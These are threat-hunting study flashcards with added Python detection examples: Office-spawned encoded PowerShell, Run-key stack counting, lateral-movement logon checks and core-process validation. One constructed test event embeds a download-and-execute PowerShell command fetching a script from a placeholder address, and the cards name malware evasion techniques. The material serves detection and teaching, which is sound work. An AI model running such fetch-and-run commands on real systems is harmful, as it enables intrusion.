Threat Hunting 101 Flashcards

1
Q

Prerequisites for Threat Hunting?

A
  • The CIS Critical Security Controls (formerly the SANS “Top 20”) are a good place to start
  • Minimum requirements:
    ■ An inventory of systems, networks and software
    ■ A baseline taken before an incident: know what “normal” looks like on your network
    ■ An incident response plan in place BEFORE an incident
    ■ A list of known privileged accounts
    ■ Knowledge of where your sensitive data is located
2
Q

Threat Hunting Frameworks?

A

MITRE ATT&CK
Lockheed Martin’s Cyber Kill Chain
FireEye’s Attack Lifecycle
Gartner’s Cyber Attack Model

3
Q

Should I move from left to right when using the ATT&CK Framework while executing my exercise?

A

There is no specific order.
Use ATT&CK to support your hypothesis.
If you don’t have a hypothesis, start hunting where the high-risk and first-impact areas are, then work top-down from there.

4
Q

Threat hunting should be focused, how?

A

■ Logs that matter
■ Common patterns used by attackers
■ Get a tangible result
■ Improving technique with each iteration of the hunt

5
Q

What Do You Need to Start Threat Hunting?

A
  • Automated blocking and monitoring tools such as firewalls, antivirus and endpoint management
  • Network packet capture
  • SIEM
  • Threat intelligence
6
Q

Some Threat Hunting Tools?

A
  • Sqrrl - APT detection platform that combines link analysis and UBA (user behaviour analytics)
  • Sysmon
  • FireEye Redline
  • Volatility
  • malware-traffic-analysis.net
  • Windows Event Forwarding
  • Bricata
  • Cortex XDR
7
Q

What is an effective cyber threat hunting process?

A

non-signature-based detection
anomaly- and behavior-based analytics
external threat intelligence sources

8
Q

How does an analyst start correlating data to determine whether there is cause for further investigation?

A

By examining and correlating various sources of data, such as authentication logs or traffic flow records.

9
Q

What are the 5 HMM (Hunting Maturity Model) levels?

A

HM0 (Initial): Relies primarily on automated alerting (IDS, SIEM, antivirus); little or no routine data collection; no real hunting
-
HM1 (Minimal): Still relies on alerting, but collects data from systems and uses threat intel feeds to search for indicators; hunting is manual
-
HM2 (Procedural): Incorporates hunting procedures developed by others (external sources); collects more data from systems; an active approach, but little ability to create new procedures
-
HM3 (Innovative): Analyses diverse data types, applies machine learning, identifies patterns in alerts, and creates and publishes its own hunting procedures
-
HM4 (Leading): HM3 capabilities, plus tactical-level analysis is automated; scripts and programs are built from intelligence, so analysts can focus on creating new hunt methods

10
Q

What are the four stages of the hunting loop?

A

Hypothesize
Investigate
Uncover
Inform and Enrich

11
Q

Examples of a pattern or the attacker’s TTP?

A

Specific registry key modifications, e.g. the Run keys an implant sets for persistence

12
Q

The steps of the Hunt-Uncover stage?

A

Investigate specific IOCs
Link the various IOCs together
Share the TTPs discovered

13
Q

The steps in the Inform and Enrich stage?

A
  • Use knowledge from Uncover stage to reduce risk and simplify future hunts
  • Document hunting cycle result
  • Automate hunting repeatable tasks
  • Create signatures and rules for threat detection systems using new findings.
14
Q

What three metric groups is a vulnerability evaluated under in CVSS?

A
  • Base group: characteristics of a vulnerability that are constant over time
  • Temporal group: characteristics of a vulnerability that change over time
  • Environmental group: characteristics of a vulnerability that depend on the organization’s environment
15
Q

How scoring works for the Base Group - CVSS?

A

0.0 - 10.0

0 is the least severe, 10 the most severe

16
Q

The base group metrics?

A
  • Exploitability metrics: Attack Vector (AV), Attack Complexity (AC), Privileges Required (PR), User Interaction (UI)
  • Scope (S)
  • Impact metrics: Confidentiality (C), Integrity (I), Availability (A)
17
Q

The temporal group metrics?

A
  • Exploit Code Maturity (E)
  • Remediation Level (RL)
  • Report Confidence (RC)
18
Q

What is the importance of CVSS?

A
Reports:
- vulnerability severity
- urgency
- priority of response
Note:
CVSS does not estimate the chance of being attacked; it estimates the likelihood of compromise when attacked and the potential damage.
19
Q

How CVSS is used in Threat Hunting?

A
  • Prioritize remediation efforts
  • Identify how vulnerabilities are used by attackers

20
Q

Maintenance and Guidance of CVSS?

A

FIRST (Forum of Incident Response and Security Teams)

21
Q

What are the conditions for a Hot Threat to be recorded in the database?

A
  • Newly disclosed vulnerability with a CVSS base score of High (7.0 or greater)
  • Intelligence indicating attacks targeted at specific customers (from Talos, open-source intel-sharing forums, ISACs and law enforcement)
  • Native intelligence: growing evidence of a campaign developing on customers’ sites, a surge in reliable and high-fidelity security alerts, or an opaque priority request to place vigilance in monitoring specific network zones for a specified time period
22
Q

Threat Awareness Resources?

A
  • OWASP
  • Spamhaus Project
  • Alexa top sites list and the GoatRider tool (website traffic analysis)
  • Farsight Security’s DNSDB
23
Q

Threat Intelligence Sources?

A
  • Malware detection and analysis sites
  • Web content verification sites
  • Network utilities
  • Script decoding utilities
  • Blogs and Feeds
24
Q

What three aspects of an attack should a hunter look into?

A
  • Infection Vector
  • Persistence
  • Lateral Movement
25
Q

Open source Threat Hunting tools for smaller organizations or doing it on your own?

A

Host, Network and Log Data:
GRR, Sysmon, Bro (now Zeek), Winlogbeat

Storage and Analytics:
ELK stack: Elasticsearch, Logstash, Kibana

Infrastructure:
Puppet, Chef, Docker

26
Q

Threat Hunting Skills?

A

Offensive Skills

Network Analysis - Host Analysis

Malware Analysis - Memory Analysis

Most importantly

  • Investigative mind
  • Attacker mindset
  • Patience to work long hours to complete a TH exercise
  • Continuously search for new threats and
  • Open to use new tools or create them.
27
Q

Attack Scenario - Infection Vector

A

External
Delivery Method: Phishing - External Download
Exploit Method: Office Macro - PDF Vulnerability

Internal
Delivery Method: USB - Network Share
Exploit Method: Native Executable - HTA

28
Q

Elements of hypotheses for the areas to look into?

i.e. infection vector, persistence and lateral movement.

A
  • What data do I need?
  • How do I get it?
  • How do I hunt through that data?
29
Q
  • What data do I need?
  • How do I get it?
  • How do I hunt through that data?
A

External Vectors / Perimeter Logs

  • Bro logs
  • Email and Proxy logs

Internal Vectors

  • Process Data
  • Registry
  • Windows Events
30
Q

Delivery Vector - Phishing - Office Macro Exploit used

What data do I need?

A
  • Process execution data
  • Enhanced PowerShell logging (script block and module logging)
  • Email logs
31
Q
  • Process execution data
  • Enhanced PowerShell logging (script block and module logging)
  • Email logs
    Where do I get the data from?
A
  • Sysmon / osquery
  • Windows Event logs
  • Email Servers
32
Q
  • Sysmon / osquery
  • Windows Event logs
  • Email Servers
    How to hunt through this data?
A
  • Search for Office programs (winword.exe, excel.exe, powerpnt.exe, …) spawning powershell.exe
  • Search command-line arguments for an encoded command (-EncodedCommand / -enc)
    Then query Kibana for that data to get a visualization of that pattern and attack
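
Worked example of the hunt above, added here and not part of the original deck: it runs the two searches (an Office parent spawning PowerShell, and an encoded command on the command line) over a few constructed Sysmon Event ID 1 records and decodes the payload so the analyst can read it before pivoting to Kibana. The field names follow Sysmon’s (ParentImage, Image, CommandLine); the events, hosts and the 203.0.113.5 address are made up for the example.

```python
import base64
import binascii
import ntpath

# Office parents and PowerShell images the hunt looks for (lower-case basenames).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def _b64_utf16(cmd: str) -> str:
    """Encode a command the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed Sysmon Event ID 1 (process creation) records for this example, not real
# telemetry. 203.0.113.5 is a TEST-NET placeholder address.
SAMPLE_EVENTS = [
    {"host": "ws01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc "
                    + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"host": "ws02",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1"},
    {"host": "ws03",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -e " + _b64_utf16("Get-Service | Where-Object Status -eq Running")},
    {"host": "ws04",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]


def extract_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line has none.

    powershell.exe accepts any unambiguous prefix of the parameter name, so -e, -ec,
    -enc and -EncodedCommand all work; the check mirrors that rule (-ExecutionPolicy
    is not a prefix of "encodedcommand" and is therefore ignored).
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        flag = tok[1:].lower()
        if flag and flag[0] == "e" and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1].strip("\"'"), validate=True)
            except binascii.Error:
                return None
            return raw.decode("utf-16le", errors="replace")
    return None


def hunt(events):
    """Flag PowerShell launches that have an Office parent and/or carry an encoded command."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()
        if image not in POWERSHELL_IMAGES:
            continue
        parent = ntpath.basename(ev["ParentImage"]).lower()
        reasons = []
        if parent in OFFICE_PARENTS:
            reasons.append("office_parent")
        decoded = extract_encoded_command(ev["CommandLine"])
        if decoded is not None:
            reasons.append("encoded_command")
        if reasons:
            findings.append({"host": ev["host"], "parent": parent,
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["parent"], f["reasons"], (f["decoded"] or "")[:60])
```

The ws03 hit shows why the two searches are kept separate: an encoded command from explorer.exe may be an administrator’s script, so the parent tells you which findings to open first.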
33
Q

How do attacker establish Persistence?

A

Traditional
- Run keys - Services - Scheduled Tasks

Creative/Stealthy

  • Office templates
  • Hijacking Windows features (AppInit DLLs / Accessibility features)

Requires host analysis skills

34
Q

Persistence example - RUN KEYS
What data is needed?
Where to get the data from?
How to hunt through the data?

A
What?
Registry Run key locations: Run, RunOnce, RunOnceEx
Where?
A PowerShell script, deployed by Group Policy, collecting to Elastic
How?
Group by executable in the Run key values
Group by executable path
Command lines / arguments
Hashing of the referenced executables
First seen / last run
35
Q

Lateral Movement

Two key areas to look into for evidence?

A

Recon
DNS Zone Transfers, LDAP Enumeration, Port Scanning

Access
PSExec - RDP - PS Remoting

36
Q

Recon
DNS Zone Transfers, LDAP Enumeration, Port Scanning

Access
PSExec - RDP - PS Remoting

Where do I find the data?

A
  • Windows event logs (EVT/EVTX)
  • Bro/Network logs
  • Enumeration artefacts
  • IDS log parsing
37
Q

Four Primary Threat Hunting Techniques?

A

Searching
Clustering
Grouping
Stack Counting
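
Stack counting applied to the Run-key collection described in the RUN KEYS persistence card above, added here as an example and not code from the original deck. It assumes each collected value has been shipped as a record with host, key, name and data fields (an assumption about the collector’s output), normalizes the executable path so per-user profile paths stack together, and reports the executables at the bottom of the stack plus any core Windows process name autostarting from outside C:\Windows. All records are constructed.

```python
import ntpath
import re
from collections import defaultdict

HKLM_RUN = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
HKCU_RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed collection results: one record per Run-key value, as a per-host
# collector script would ship them to Elastic. Not real data.
SAMPLE_RUN_KEYS = []
for host, user in zip(["ws01", "ws02", "ws03", "ws04", "ws05"],
                      ["alice", "bob", "carol", "dave", "erin"]):
    SAMPLE_RUN_KEYS.append({"host": host, "key": HKLM_RUN, "name": "VendorAgent",
                            "data": r'"C:\Program Files\Vendor\agent.exe" /silent'})
    SAMPLE_RUN_KEYS.append({"host": host, "key": HKCU_RUN, "name": "OneDrive",
                            "data": r'"C:\Users\{}\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'.format(user)})
# two entries that exist on a single host each: a masquerading svchost.exe in a
# user profile, and a DLL loaded through rundll32.exe from ProgramData
SAMPLE_RUN_KEYS.append({"host": "ws04", "key": HKCU_RUN, "name": "Updater",
                        "data": r"C:\Users\dave\AppData\Roaming\svchost.exe -k netsvcs"})
SAMPLE_RUN_KEYS.append({"host": "ws05", "key": HKLM_RUN, "name": "Helper",
                        "data": r"rundll32.exe C:\ProgramData\cache\x.dll,Start"})

USER_PROFILE = re.compile(r"^c:\\users\\[^\\]+\\")
CORE_NAMES = {"svchost.exe", "csrss.exe", "smss.exe", "lsass.exe", "services.exe",
              "wininit.exe", "winlogon.exe", "explorer.exe"}


def executable_of(data: str) -> str:
    """Pull the program from a Run-key value, honouring a quoted path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split()[0]


def normalize(exe: str) -> str:
    """Lower-case and replace the user name in a profile path so per-user entries stack together."""
    return USER_PROFILE.sub(lambda _: r"c:\users\*" + "\\", exe.lower())


def stack_count(records):
    """Map each normalized executable to the set of hosts on which it autostarts."""
    stacks = defaultdict(set)
    for r in records:
        stacks[normalize(executable_of(r["data"]))].add(r["host"])
    return stacks


def outliers(records, max_hosts=1):
    """Executables present on at most max_hosts hosts: the bottom of the stack."""
    total = len({r["host"] for r in records})
    return sorted((exe, len(hosts), total)
                  for exe, hosts in stack_count(records).items() if len(hosts) <= max_hosts)


def masquerades(records):
    """Core Windows process names autostarting from outside the Windows directory."""
    hits = []
    for r in records:
        exe = normalize(executable_of(r["data"]))
        if ntpath.basename(exe) in CORE_NAMES and not exe.startswith("c:\\windows\\"):
            hits.append((r["host"], exe))
    return hits


if __name__ == "__main__":
    for exe, n, total in outliers(SAMPLE_RUN_KEYS):
        print(f"{exe}: {n}/{total} hosts")
    print("masquerades:", masquerades(SAMPLE_RUN_KEYS))
```

The profile-path normalization is the step that makes stacking work at all: without it every OneDrive entry is unique per user and the real outliers drown in five hundred “rare” paths.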

38
Q

Datasets - Endpoint Data?

A
Process execution metadata
Registry access data
File data
Network data
File prevalence
39
Q

Datasets - Network Data?

A
Network session data 
Bro logs
Proxy logs 
DNS logs
Firewall logs 
Switch and Router logs
40
Q

Datasets - Security Data?

A

Threat Intelligence
Alerts
Friendly Intelligence

41
Q

Lateral Movement - Attack Scenario
What data do I need?
Where to get it from?
How to hunt through it?

A

What?
Windows event logs (EVT/EVTX)
Bro logs

Where?
Winlogbeat parsing
Collect to Elastic

How?
• Anomalous user/service logins
• High count of ‘one to many’ connections
• Traffic on LDAP ports
• Session types/privileges
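
An added example (not from the original deck) of the first two ‘How?’ checks above, run over constructed 4624 successful-logon events: a sliding-window count of distinct target hosts per (source IP, account) to surface one-to-many connections, and a naming-convention check for service accounts appearing in interactive (type 2) or RDP (type 10) logons. Field names follow the Security log’s 4624 event (Computer, TargetUserName, IpAddress, LogonType); the hosts, accounts and addresses are placeholders, and the svc_ prefix and the 10-minute / 5-host thresholds are assumptions to tune for your environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOGON_INTERACTIVE, LOGON_NETWORK, LOGON_REMOTE_INTERACTIVE = 2, 3, 10

# Constructed 4624 events reduced to the fields the hunt uses. Hosts, accounts
# and RFC 1918 addresses are placeholders, not real data.
_T0 = datetime(2024, 1, 15, 2, 0, 0)
SAMPLE_LOGONS = [
    # one workstation reaching eight servers inside four minutes
    {"TimeCreated": _T0 + timedelta(seconds=30 * i), "Computer": f"srv{i + 1:02d}",
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.5", "LogonType": LOGON_NETWORK}
    for i in range(8)
] + [
    # ordinary file-share and printer use
    {"TimeCreated": _T0 + timedelta(hours=7), "Computer": "fs01",
     "TargetUserName": "asmith", "IpAddress": "10.0.0.7", "LogonType": LOGON_NETWORK},
    {"TimeCreated": _T0 + timedelta(hours=7, minutes=2), "Computer": "print01",
     "TargetUserName": "asmith", "IpAddress": "10.0.0.7", "LogonType": LOGON_NETWORK},
    # a service account used interactively over RDP
    {"TimeCreated": _T0 + timedelta(hours=1), "Computer": "srv03",
     "TargetUserName": "svc_sql", "IpAddress": "10.0.0.9", "LogonType": LOGON_REMOTE_INTERACTIVE},
]


def one_to_many(events, window=timedelta(minutes=10), threshold=5,
                logon_types=(LOGON_NETWORK, LOGON_REMOTE_INTERACTIVE)):
    """(source IP, account, distinct targets) for every source that logged on to
    at least `threshold` distinct hosts within some `window`-long period."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["LogonType"] in logon_types:
            by_source[(ev["IpAddress"], ev["TargetUserName"])].append((ev["TimeCreated"], ev["Computer"]))
    hits = []
    for (ip, user), logons in by_source.items():
        logons.sort()
        in_window, start, peak = Counter(), 0, 0
        for t, target in logons:
            in_window[target] += 1
            while logons[start][0] < t - window:      # drop logons that fell out of the window
                old = logons[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            hits.append((ip, user, peak))
    return sorted(hits)


def service_accounts_interactive(events, prefix="svc_"):
    """Service accounts (by naming convention) seen in interactive or RDP logons."""
    return sorted({(ev["Computer"], ev["TargetUserName"], ev["IpAddress"])
                   for ev in events
                   if ev["TargetUserName"].lower().startswith(prefix)
                   and ev["LogonType"] in (LOGON_INTERACTIVE, LOGON_REMOTE_INTERACTIVE)})


if __name__ == "__main__":
    print("one-to-many:", one_to_many(SAMPLE_LOGONS))
    print("service accounts interactive:", service_accounts_interactive(SAMPLE_LOGONS))
```

Counting distinct targets rather than raw logon events matters: a single file server will generate dozens of 4624s per user per hour, but one account touching eight different servers in four minutes is what PsExec-style movement looks like. Vulnerability scanners and backup agents will trip the same check, so keep an allowlist of those sources.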
42
Q

How Do You Know What to Look For?

A

Set some prioritized intelligence requirements (PIRs)

43
Q

What is threat hunting?

A

“the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions”

Sqrrl defined

44
Q

Examples of Fileless Malware and Techniques?

A

Code injection

API Hooking

45
Q

How to deal with huge data sets?

A

Machine Learning

ex. Lateral Movement Data Sets

46
Q

What is so interesting in the Threat Hunter role?

A

It builds, maintains, and improves defensive and offensive skills.
Gets involved in Machine Learning and scripting

47
Q

What is Atomic Red Team?

A

Atomic Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK framework.

48
Q

MITRE ATT&CK?

A

MITRE ATT&CK™ is a knowledge base that

  • models cyber adversaries’ tactics and techniques
  • shows how to detect or stop them
49
Q

Threat Hunting Use Cases?

A

Anomaly-based detection is a good first start: identify interesting or unaccountable items in a SIEM
- SSH logins at 1 am
- Consistent ICMP traffic to unknown IPs
This gives a good starting point to hunt for threats.

Additionally

  • Anonymizing VPNs/Tor from inside the network
  • Logins from strange locations
  • More than one remote connection at the same time for the same user or being logged in locally and remotely at the same time.
50
Q

What is the primary difference between threat hunting and penetration testing?

A

Penetration testing takes an outside-in approach; threat hunting is much more of an inside-out approach.

  • It starts from the assumption (more specifically, the hypothesis) that an adversary could already be inside your IT infrastructure, and you take steps to ascertain that. If the hypothesis is confirmed, you then mitigate so that they can’t get in again.
51
Q

What happens if I don’t find anything in the threat-hunting exercise that I have just engaged in?

A

There is a very good chance that you will discover other kinds of security vulnerabilities which you thought never existed before.

52
Q

Should I just pick any random area of the ATT&CK framework to start my threat-hunting exercise?

A
  • First analyze the log files and the respective warnings/ alerts to see what trouble points exist.
  • You also need to make sure that you have access permissions for resources which you need for hunting .
    example: Don’t search for account manipulation adversaries if the access permissions and tools are not in place first.
53
Q

Should I move from left to right when using the ATT&CK Framework while executing my exercise?

A

Don’t have to address each and every cyber-related issue in the framework, and don’t feel overwhelmed by it.

Use the ATT&CK as a support for hypothesis and start from there. If you don’t have a hypothesis at first, start threat-hunting where high-risk and first impact areas are then work from a top-down approach from there.

54
Q

Privilege escalation: what should a threat hunter look for?

A
  • Look into any known gaps or weaknesses that currently exist
  • An EDR solution would be the most beneficial technique
  • File Integrity Monitoring (FIM): if there are any suspicious changes to files, examine the history of employee logins for any anomalous behaviour
  • Misconfiguration, as this is another backdoor for the cyberattacker
55
Q

What are the two primary types of threat-hunting exercises?

A
  • On-Demand Investigation Mode: used by security teams to investigate any suspicious or anomalous activities after they have been detected.
  • Continuous Monitoring or Testing Mode: continuously monitoring and/or testing their security posture to proactively identify and investigate any suspicious events.
56
Q

How would you specifically describe data leakage?

A

The departure of data from the place where it was intended to be stored.

57
Q

top sources of data leakage?

A
  • Users
  • misconfigurations
  • Web applications built from insecure source code
  • Inadequate security controls
58
Q

How to detect Privilege Escalation?

A
  • EDR solution
  • File Integrity Monitoring (or FIM for short)
  • Employee logins must be examined for any types of anomalous behaviors.
  • Misconfigured systems
59
Q

Should threat hunting be conducted in one part of an infrastructure, or multiple areas?

A

Multiple areas, for comprehensive results.

60
Q

Where are the Visibility Points?
Where/what are the detection points?
Where to setup sensors?

A

Traffic at all major points
(core switch where VLANs are trunked, firewalls and their ports, internet ports, edge routers)

System logs that control access

  • VPN
  • 2FA
  • O365/Azure

Security Tools
AV, Firewalls, IPS

61
Q

Logging Sources?

A

NGFW, WAF

Entry points
- VPN, remote access, edge routers, Wi-Fi

Directory / authentication services
- Active Directory, Azure/O365, IM, 2FA

Protection/Detection Tools

  • IPS/IDS
  • AV/HIPS
  • Network Sensors

Email

62
Q

Network bandwidth/traffic monitoring tools?

A
  • PRTG
  • TCPdump
  • NTOP
  • Nagios

Note: Used for anomaly detection

63
Q

The Components of a Hypothesis Template

A
  • Tactic and Technique
  • Procedure
  • Collection Requirements
  • Scope
  • Exclusions
  • Analysis Plan
64
Q

SIEM use for Threat Hunting?

A

Anomaly Detection uses

  • anomalous login activity
  • Anomalous blocking by firewalls
  • Anomalous denied access events
65
Q

How to tell if a Windows Core Process is legitimate ?

A
  • expected parent process spawn it?
  • running out of the expected path?
  • spelled correctly?
  • running under the proper SID?
  • signed by Microsoft?
66
Q

What is SMSS.EXE (the Session Manager)?

A

Responsible for creating new sessions.

67
Q

smss. exe
- Executable path?
- Parent Process?
- Username?
- Base Priority?
- Time of Execution?

A

Executable Path: %SystemRoot%\System32\smss.exe
Parent Process: System
Username: NT AUTHORITY\SYSTEM (S-1-5-18)
Base Priority: 11
Time of Execution: For Session 0, within seconds of boot time

68
Q

What’s the function of CSRSS.EXE (Client/Server Runtime Subsystem)?

A
  • managing processes and threads
  • making the Windows API available to other processes
  • mapping drive letters and creating temp files
  • handling the shutdown process
69
Q

CSRSS.exe

  • Executable path?
  • Parent Process?
  • Username?
  • Base Priority?
  • Time of Execution?
A

Executable Path: %SystemRoot%\System32\csrss.exe
Parent Process: Created by a child instance of smss.exe that exits immediately, so csrss.exe appears to have no parent
Username: NT AUTHORITY\SYSTEM (S-1-5-18)
Base Priority: 13
Time of Execution: For Sessions 0 & 1, within seconds of boot time
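
The checks from the three preceding cards (expected parent, path, spelling, SID) turned into code, as an added example rather than anything from the original deck. The baseline holds the smss.exe and csrss.exe attributes quoted above; %SystemRoot% is assumed to be C:\Windows; the process snapshot is constructed and includes an smss.exe in a user-writable path, a csrss.exe dropped in Temp with a live parent, and a misspelled csrsss.exe caught by a one-character edit-distance lookalike check.

```python
import ntpath

SYSTEM_SID = "S-1-5-18"

# Expected attributes for the two core processes described above. A parent of
# None means no live parent is expected: csrss.exe is launched by a child
# smss.exe instance that exits, so a legitimate csrss.exe shows no parent.
CORE_BASELINE = {
    "smss.exe": {"path": r"%SystemRoot%\System32\smss.exe", "parent": "System", "sid": SYSTEM_SID},
    "csrss.exe": {"path": r"%SystemRoot%\System32\csrss.exe", "parent": None, "sid": SYSTEM_SID},
}

# Constructed process snapshot (pid, image path, live parent name, owner SID); not real data.
SAMPLE_PROCESSES = [
    {"pid": 372, "path": r"C:\Windows\System32\smss.exe", "parent": "System", "sid": SYSTEM_SID},
    {"pid": 520, "path": r"C:\Windows\System32\csrss.exe", "parent": None, "sid": SYSTEM_SID},
    {"pid": 4412, "path": r"C:\Users\Public\smss.exe", "parent": "explorer.exe",
     "sid": "S-1-5-21-1004336348-1177238915-682003330-1001"},
    {"pid": 4520, "path": r"C:\Windows\System32\csrsss.exe", "parent": "cmd.exe", "sid": SYSTEM_SID},
    {"pid": 4600, "path": r"C:\Windows\Temp\csrss.exe", "parent": "powershell.exe", "sid": SYSTEM_SID},
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; used to catch one-character lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_process(proc, baseline=CORE_BASELINE, system_root=r"C:\Windows"):
    """Return the ways a process deviates from the baseline; an empty list means it looks legitimate."""
    name = ntpath.basename(proc["path"]).lower()
    reasons = []
    if name in baseline:
        expected = baseline[name]
        want_path = expected["path"].replace("%SystemRoot%", system_root).lower()
        if proc["path"].lower() != want_path:
            reasons.append("unexpected_path")
        parent = proc.get("parent")
        if expected["parent"] is None:
            if parent is not None:
                reasons.append("unexpected_live_parent")
        elif (parent or "").lower() != expected["parent"].lower():
            reasons.append("unexpected_parent")
        if proc["sid"] != expected["sid"]:
            reasons.append("unexpected_sid")
    else:
        # Not a known core name: is it one character away from one? (csrsss.exe, smsss.exe, ...)
        for core in baseline:
            if edit_distance(name, core) <= 1:
                reasons.append(f"lookalike_of_{core}")
    return reasons


def triage(processes):
    """pid -> reasons, for every process that fails at least one check."""
    result = {}
    for p in processes:
        reasons = check_process(p)
        if reasons:
            result[p["pid"]] = reasons
    return result


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_PROCESSES).items():
        print(pid, reasons)
```

Extending the baseline is a matter of adding rows (wininit.exe, services.exe, lsass.exe and so on) with the same four attributes; the signature check from the first of the three cards is deliberately left out here because it needs the Authenticode APIs on the live host.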

70
Q

What is Baselining?

A

A file that will be used for comparisons against current settings and/or configurations.
Compare the current state of a machine, file system, etc. against the baseline to determine anything out of place.

71
Q

Tools for monitoring unauthorized changes to files?

A
TripWire
SolarWinds
AlienVault
TrustWave
LogRhythm
72
Q

Baselining Tools ?

A
  • System Center Configuration Manager (SCCM)
  • PowerShell (Desired State Configuration feature)
    • cmdlets: Compare-Object, Get-Service, Get-Process
  • Microsoft Security Compliance Manager (SCM)

Similarly: Puppet, Ansible or Chef

73
Q

What should be baselined?

A

• Accounts on a system (user or service)
• Local administrators on a system
• Folder permissions
• Folders contents
– Tasks folder (scheduled tasks)
– Network folders containing internal install executables & files

74
Q

How is Malware Delivered ?

A
• Physical media
• Email (attachments)
• URL links
• Drive-by downloads
• Web advertising
• Social media
• File shares
• Software vulnerabilities
75
Q

What are the Malware Evasion Techniques?

A

Alternate Data Streams

Injections

Masquerading 

Packing/Compression (Yoda Packer and UPX)

Recompiling

Obfuscation

Anti-reversing Techniques
76
Q

How are Alternate Data Streams created and viewed?

A

Create Streams by:

  • CreateFile Windows API
  • WriteFile Windows API

To View ADS
Sysinternals Streams, or PowerShell’s Get-Item cmdlet with the -Stream parameter

77
Q

Examples of Injections and how they work?

A
DLL Injection 
(Windows API CreateRemoteThread()) + others 
Reflective DLL Injection
(Metasploit, PowershellEmpire, C/C++) 
PE Injection
Thread Hijacking
78
Q

What is Anti-reversing Techniques and how they work?

A
  • Detect that malware is being run in a virtual machine
  • Detect that a debugger is attached to the malware
  • Junk code can be inserted into the malware as misdirection
79
Q

Examples of malware persistence?

A
Autostarts
• Scheduled tasks
• COM hijacking
• DLL hijacking
• Windows services
80
Q

Autostart Locations ?

A
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

To find Autostart locations: AutoRuns - SysInternals

81
Q

Examples of DLL Hijacking?

A
  • Search Order
    • Phantom DLL
    • Side Loading
82
Q

Examples of Windows Services?

A
  • Service creation (created with the “sc” command)
  • Service replacement
  • Service recovery
83
Q

Malware Detection Tools?

A

PE Capture
ProcScan
Meterpreter Payload Detection
Reflective Injection Detection

84
Q

Detection Techniques?

A
  • Fuzzy Hashing (Used by VirusTotal)
    • Import Hashing (Used by VirusTotal)
    • Execution Tracing
85
Q

Memory Analysis Tools?

A
  • Mandiant’s (FireEye) Redline
  • Volatility

86
Q

Windows Event Logs path?

A

%SYSTEMROOT%\System32\Winevt\Logs

87
Q

Event log location in the registry?

A

HKLM\SYSTEM\CurrentControlSet\Services\EventLog

88
Q

Why are event logs important?

A

• logons that failed or that were successful.
• changes to user permissions.
• system services that were created, started, or stopped.
• changes to the audit policy.
• specific application usage.
• events generated by installed applications, such as
AV.

89
Q

What is done if the event information is not clear?

A

Events and Errors Message Center

90
Q

Windows Event IDs that should be monitored?

A

Hunting suspicious accounts:
• 4720 (account created)
• 4624 (successful logon)
• 4648 (logon using explicit credentials)
• 4625 (failed logon)
• 4634 (successful logoff)
• 4647 (user-initiated logoff)

91
Q

Windows Event Logs Hunting Events?

A
Suspicious Account Events
Password Attacks
Golden Ticket (Kerberos)
RDP Sessions
Scheduled Tasks
Service Creation
Log clearing
Psexec
92
Q

Windows Event Logs logging tools?

A
  • Sysmon
    (sysmonconfig-export.xml - SwiftOnSecurity)
  • SIEM
93
Q

Tasks?

A
  • Conduct basic static analysis on Kali Linux (binwalk, ExifTool and md5deep) of a Meterpreter reverse shell found on the internal network (analyze and classify the malware)
94
Q

Where do behavioral detection and machine learning fail?

A

When trusting or benchmarking an already compromised environment as the baseline.